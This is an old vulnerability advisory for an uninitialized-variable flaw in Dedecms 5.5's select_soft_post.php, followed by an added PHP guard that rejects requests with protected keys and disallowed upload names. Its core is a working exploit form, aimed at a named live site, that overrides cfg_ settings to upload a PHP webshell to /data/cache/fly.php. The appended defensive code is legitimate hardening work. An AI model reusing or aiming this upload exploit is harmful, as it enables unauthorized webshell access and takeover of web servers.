Dedecms select_soft_post.php uninitialized variable vulnerability

ID MYHACK58:62200925143
Type myhack58
Reporter Anonymous
Modified 2009-10-28T00:00:00


Affected version: Dedecms 5.5

Vulnerability description: The vulnerable file is include\dialog\select_soft_post.php. The variable $cfg_basedir is not initialized properly, which makes it possible to bypass the authentication and system variable initialization files, so that any file can be uploaded to a specified directory. Exploitation requires register_globals=on, which allows the relevant variables to be assigned through a custom form.

Test code:

<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell
<input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

SEBUG security recommendations: None yet. Please watch for the official patch!
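
A defensive guard for the pattern described above, as an added example (not Dedecms code and not an official patch). The function names, constants and the extension allowlist are assumptions made for illustration; the sample request reuses the field names of the test form.

```php
<?php
// Added illustration, not Dedecms code. All names below are hypothetical.

// Request keys that must never become variables: config names and superglobals.
const PROTECTED_PREFIXES = ['cfg_', 'GLOBALS', '_GET', '_POST', '_COOKIE', '_FILES', '_SERVER'];
// Upload allowlist fixed in code (assumed values), so a request cannot redefine it.
const ALLOWED_EXTENSIONS = ['zip', 'rar', 'gz', 'txt'];

/** Return the request keys that would shadow configuration or superglobals. */
function find_shadowing_keys(array ...$sources): array
{
    $hits = [];
    foreach ($sources as $source) {
        foreach (array_keys($source) as $key) {
            foreach (PROTECTED_PREFIXES as $prefix) {
                if (strncmp((string) $key, $prefix, strlen($prefix)) === 0) {
                    $hits[(string) $key] = true; // de-duplicate across sources
                    break;
                }
            }
        }
    }
    return array_keys($hits);
}

/** Accept only a bare "name.ext" (one dot, no path parts) with an allowed extension. */
function is_allowed_upload_name(string $name): bool
{
    if (!preg_match('/^[A-Za-z0-9_-]+\.([A-Za-z0-9]+)$/D', $name, $m)) {
        return false;
    }
    return in_array(strtolower($m[1]), ALLOWED_EXTENSIONS, true);
}

// Constructed request using field names from the test form on this page.
$post = [
    'activepath'   => '/data/cache/',
    'cfg_basedir'  => '../../',
    'cfg_softtype' => 'php',
    'job'          => 'upload',
    'newname'      => 'fly.php',
];

// A real handler would stop with an error response at the first failed check.
$shadowing = find_shadowing_keys($post);
if ($shadowing !== []) {
    echo 'rejected, protected keys in request: ', implode(', ', $shadowing), PHP_EOL;
}
if (!is_allowed_upload_name($post['newname'])) {
    echo 'rejected, file name not allowed: ', $post['newname'], PHP_EOL;
}
```

Setting register_globals = Off removes the precondition the advisory names; the guard covers code that imports request variables by other means.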